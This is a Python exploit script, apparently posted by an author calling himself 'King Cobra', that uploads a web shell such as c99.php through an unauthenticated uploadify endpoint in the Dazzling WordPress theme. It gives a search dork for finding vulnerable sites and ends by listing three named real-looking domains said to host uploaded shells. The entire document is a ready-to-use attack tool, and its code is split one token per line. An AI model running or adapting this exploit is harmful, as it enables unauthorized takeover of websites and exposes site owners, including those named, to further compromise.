import
optparse
import
sys
import
pycurl
from
cStringIO
import
StringIO
print
"#________________________________________________________#"
print
"| |"
print
"| Dazzling shell Upload Exploit |"
print
"| |"
print
"| Author : King Cobra |"
print
"| Dork : inurl:/wp-content/themes/Dazzling |"
print
"| |"
print
"| Greeting to : n0m0r3 |"
print
"#________________________________________________________#\n"
parser
=
optparse.OptionParser(usage
=
'python %s -t http://site.com -s shellname -p UploadingPath \nExample: python %s -t http://target.com -s c99.php -p /wp-content/uploads'
%
(sys.argv[
0
],sys.argv[
0
]))
parser.add_option(
'-t'
,
'--target'
,action
=
"store"
, dest
=
"target"
,
help
=
"-t http://site.com"
, default
=
"")
parser.add_option(
'-s'
,
'--shell'
,action
=
"store"
, dest
=
"shellname"
,
help
=
"-s c99.php"
, default
=
"")
parser.add_option(
'-p'
,
'--path'
,action
=
"store"
, dest
=
"path"
,
help
=
"-p /wp-content/uploads"
, default
=
"")
options, args
=
parser.parse_args()
if
options.target
=
=
"
": print ("
Type
\
"python %s -h\" for help"
%
sys.argv[
0
])
else
:
pth
=
'folder'
shpath
=
options.path
target
=
options.target
filename
=
options.shellname
psd
=
'Filedata'
themename
=
'Dazzling'
c
=
pycurl.Curl()
c.setopt(c.POST,
1
)
c.setopt(c.HTTPPOST, [(
'title'
,
'test'
), ((psd, (c.FORM_FILE, filename)))])
c.setopt(c.VERBOSE,
0
)
bodyOutput
=
StringIO()
headersOutput
=
StringIO()
c.setopt(c.WRITEFUNCTION, bodyOutput.write)
c.setopt(c.URL,
'%s/wp-content/themes/%s/lib/uploadify/upload.php?%s=/%s'
%
(target,themename,pth,shpath) )
c.setopt(c.HEADERFUNCTION, headersOutput.write)
c.perform()
x
=
bodyOutput.getvalue()
shname
=
options.shellname
if
"/"
in
shname:
shname
=
options.shellname.rsplit(
'/'
,
1
)
if
x
=
=
"1"
:
print
(
'Shell uploaded successfully LINK=%s/%s/%s'
%
(target,shpath,shname[
1
]))
else
:
print
(
"Shell upload Failed!"
)
else
:
shname
=
options.shellname
if
x
=
=
"1"
:
print
(
'Shell uploaded successfully LINK=%s/%s/%s'
%
(target,shpath,shname))
else
:
print
(
"Shell upload Failed!"
)
Examples:
http:
/
/
www.svityaz.net
/
wp
-
content
/
themes
/
Dazzling
/
sh3ll.php
http:
/
/
tdpromin.net.ua
/
wp
-
content
/
themes
/
Dazzling
/
sh3ll.php
http:
/
/
fresh
-
import
.com.ua
/
wp
-
content
/
themes
/
dazzling
/
sh3ll.php
# Greeting to : n0m0r3